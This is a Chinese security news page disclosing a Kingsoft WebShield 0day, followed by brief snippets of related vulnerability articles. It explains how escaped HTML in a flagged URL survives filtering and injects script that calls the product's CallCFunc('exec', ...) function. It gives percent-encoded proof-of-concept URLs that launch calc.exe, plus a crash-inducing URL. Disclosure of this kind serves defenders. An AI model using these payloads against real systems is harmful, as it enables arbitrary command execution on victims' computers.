金山网盾网盾爆0day,老洞也能开新花

498)this.w
idth=498;' onmousewheel = 'javascript:return big(this)' style="WIDTH: 570px; HEIGHT: 326px" class=blogimg border=0 src="http://new.51cto.com/files/uploadimg/20090519/1738030.jpg" width=820 height=419 small="0">漏洞函数原型:C:\Program Files\Kingsoft\KSWebShieldSVC\script\popo6.htm//68行CallCFunc函数的第二个参数执行任意命令且可以带参数。function callSetting(){parent.CallCFunc( "exec", "kwsmain.exe /showsetting" );}测试方法:#xss==< IMG onerror="parent.CallCFunc('exec','c:\\windows\\system32\\calc.exe')" src="http://new.51cto.com/wuyou/news_edit.php?artID=124595#">访问一个被拦截的网页木马,在URL后加入上面的注释。http://192.168.128.1/ms06014.txt#xss=%3C%69%6D%67%20%73%72%63%3D%23%20%6F%6E%65%72%72%6F%72%3D%22%70%61%72%65%6E%74%2E%43%61%6C%6C%43%46%75%6E%63%28%27%65%78%65%63%27%2C%27%63%3A%5C%5C%77%69%6E%64%6F%77%73%5C%5C%73%79%73%74%65%6D%33%32%5C%5C%63%61%6C%63%2E%65%78%65%27%29%22%3E来源:http://hi.baidu.com/inking26/blog/item/16173b018ed707067aec2c8b.html描述:由于金山网盾对恶意地址的处理不严,攻击者通过构造一个普通的挂马页面和一个特殊的URL,可以使操作系统执行任何命令。受影响的系统:截至本文发布起的当前最新版本及其之前版本。细节:金山网盾的恶意提示部分UI是用网页代码编写的,在kwstray.exe得到恶意网址的时候,由于其处理方式的错误导致了XSS漏洞,同时利用软件中实现的某些功能,可以执行任何系统命令。具体分析如下:在接收到恶意网址后,kwstray.exe采用了如下流程对字符进行了过滤处理恶意网址 ——> HtmlEncode ——> unescape ——> 显示恶意信息这个时候,假如攻击者
估计在网址中包含html标签,
那么很可能会导致XSS攻击。不过由于恶意网址首
先进行了HtmlEncode处理,直接传入之类的html标签会被过滤成[script],这样便使我们的攻击失败。绕过的方法为:首先将html标签进行escape,这样在进行HtmlEncode的时候网址不会有任何的改变,再
经过unescape后html标签得到了还原,得以成功的
插入js代码。具体的利用如下:首先构造一个恶意的页面,该页面可以是一个普通的挂马页面,只要能被金山网盾识别为恶意就行。
然后构造一个恶意的url,
里面包含我们要插入的html代码http://localhost/index.php?html=style="background:url(javascript:parent.CallCFunc('exec','c:\\windows\\system32\\calc.exe' ))">test接着将url的html部分进行escape加密http://localhost/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e让浏览器去访问该恶意地址,这个时候网盾检测到网页中包含有恶意代码,
于是将恶意地址报告给WebShield服务,WebShield服务接受到信息后启动一个kwstray.exe实例,并且将恶意地址附带上;kwstray.exe将得到的地址进行HtmlEncode处理,然后再进行unescape,最后将内容打印给用户,这个时候html标签成功插入网页中,并且开始执行恶意代码,弹出我们的计算器程序。在恶意地址中有如下js代码。javascript:parent.CallCFunc('exec','c:\\windows\\system32\\calc.exe' )CallCFunc是网盾自己实现的用于执行程序的函数,比如绿色气泡弹出的时候,如果点击确定,网页中的js会调用CallCFunc函数执行kwsmain.exe进程,用于启动配置界面。
所以我们可以直接利用此函数运行我们的程序和命令。其它:金山网盾在对恶意地址进行解码的时候,处理不当,通过传入特殊的url,可以使浏览器崩溃。最简单的崩溃方式:http://localhost/index.php?test=a%当网盾在url中发现%号的时候,它会尝试着去进行解码,在解码过程中会导致崩溃。

时间: 2024-10-22 19:26:25

金山网盾网盾爆0day,老洞也能开新花的相关文章

Humax WiFi路由器被爆0day漏洞,可获得管理员权限

本文讲的是Humax WiFi路由器被爆0day漏洞,可获得管理员权限,最近,在2017年5月,来自Trustwave SpiderLabs的Felipe Cerqueira和Thiago Musa在HUMAX WiFi路由器型号HG-100R *中发现了一个远程漏洞.此漏洞可能会让攻击者破坏WiFi凭据,更危险的是查看路由器控制台管理员密码.该设备是由巴西一家主要互联网提供商,但也被用于世界许多其他地区. 脆弱性 该漏洞首先构造绕特殊的请求绕过管理控制台的身份验证.这是因为路由器在"url/a

多个游戏引擎爆0day漏洞

国外安全公司ReVuln的研究人员Luigi Auriemma和Donato Ferrante近期发表一篇名为"Exploiting Game Engines For Fun & Profit"的报告,报告中称发现多个游戏引擎如CryEngine 3.id Tech 4 和Hydrogen Engine等游戏引擎的漏洞,特别是一些第一人称的射击游戏,成功利用可能获取控制权限.498)this.w idth=498;' onmousewheel = 'javascript:ret

ImageMagick爆0day漏洞 全球服务器遭殃

"0day漏洞"是指一些没有公布补丁的漏洞,或者是还没有被漏洞发现者公布出来的漏洞利用工具,作为网络安全的巨大威胁,往往会给你的服务器致命一击.5月3日,图像处理软件ImageMagick就被公布出一个严重的0day漏洞(CVE-2016-3714),攻击者通过此漏洞可执行任意命令,最终窃取重要信息取得服务器控制权. 首先让我们来了解一下"ImageMagick"这个图像处理软件,ImageMagick是一个免费的创建.编辑.合成图片的软件.它可以读取.转换.写入多

遨游浏览器最新版爆0day漏洞 一千多万用户面临威胁

中介交易 SEO诊断 淘宝客 云主机 技术大厅 5月27日,国内知名网络安全公司知道创宇官方微博-知道创宇安全研究团队发布预警称傲游浏览器存在0day漏洞: 0day就是指一些没有公布补丁的漏洞,或者是还没有被漏洞发现者公布出来的漏洞.这种漏洞的利用程序对网络安全具有巨大威胁,因此0day也成为黑客的最爱. 据知道创宇安全研究团队介绍:攻击者利用该0day漏洞可以执行任意远程命令.用户使用该浏览器访问到恶意页面后,会直接下载并运行任意可执行文件(遨游浏览器不会给出任何安全提示).结合木马和其他技

遨游浏览器最新版爆0day漏洞 千万用户面临威胁

5月27日,网络安全公司知 道创宇官方微博-知道 创宇安全研究团队发布预警称傲游浏览器存在0day漏洞:498)this.w idth=498;' onmousewheel = 'javascript:return big(this)' border="0" alt="" src="http://images.51cto.com/files/uploadimg/20120604/1024520.jpg" style="width: 27

微软再爆0day漏洞Vista用户不受影响

比特网7月14日消息--昨日,两大杀毒软件厂商瑞星和赛门铁克再度发出安全警报,称发现微软视频技术控件(ActiveXcontrol)爆发零日(0day)漏洞,目前已有133万余台电脑遭攻击. 据悉,网络攻击者目前主要通过WindowsXP系统上的IE浏览器利用该漏洞发动攻击,并将矛头指向IE6和IE7浏览器,虽然目前对IE8尚无影响,但仍存潜在风险.系统 预装测试表明,使用WindowsVista系统的电脑用户目前并未受此次漏洞的影响. 零日漏洞最早于8日被黑客利用,最近每天被该漏洞攻击的电脑都

金山吴裔敏微博爆料:剑侠情缘即3将进军韩国

11月22日消息,昨日,金山游戏总裁吴裔敏从韩国G STAR游戏展回来后在微博上表示,<剑侠情缘3>即将进军韩国. 众所周知剑网3已经有了马来西亚服务器,这次金山进军韩国可谓金山在迈向国际化上又走了一步. 同时他认为,未来韩游最具潜力的产品是<METAL BLACK>和<哥布林>. (挖贝网)

IE 再爆 0day 漏洞,9和10版本不受影响

微软安全部门证实发现影响IE6-8的一个漏洞,但目前为止没有提供补丁.IE9和10不受影响.针对XP用户的紧急排险措施包括安装微软EMET工具包.禁用IE中的Java和Flash,或者更简单的--换一个浏览器. 查看:CFR Watering Hole Attack Details

IE爆出通杀0day !互联网即将引爆新的挂马浪潮?

中介交易 SEO诊断 淘宝客 云主机 技术大厅 近日网络尖刀通过微软官方通告了解到,IE浏览器爆出最新0day高危漏洞,该漏洞可导致IE浏览器造成"挂马"攻击,微软称该漏洞影响到现IE所有版本,并已经产生相关攻击事件,目前微软已经推出FIX IT临时方案,在这里网络尖刀安全团队专家提醒广大网民应快速下载官方临时补丁,以免造成不必要的损失. 下载地址:http://support.microsoft.com/kb/2887505 因未获取到相关漏洞细节,目前我们还无法确定该通杀0day会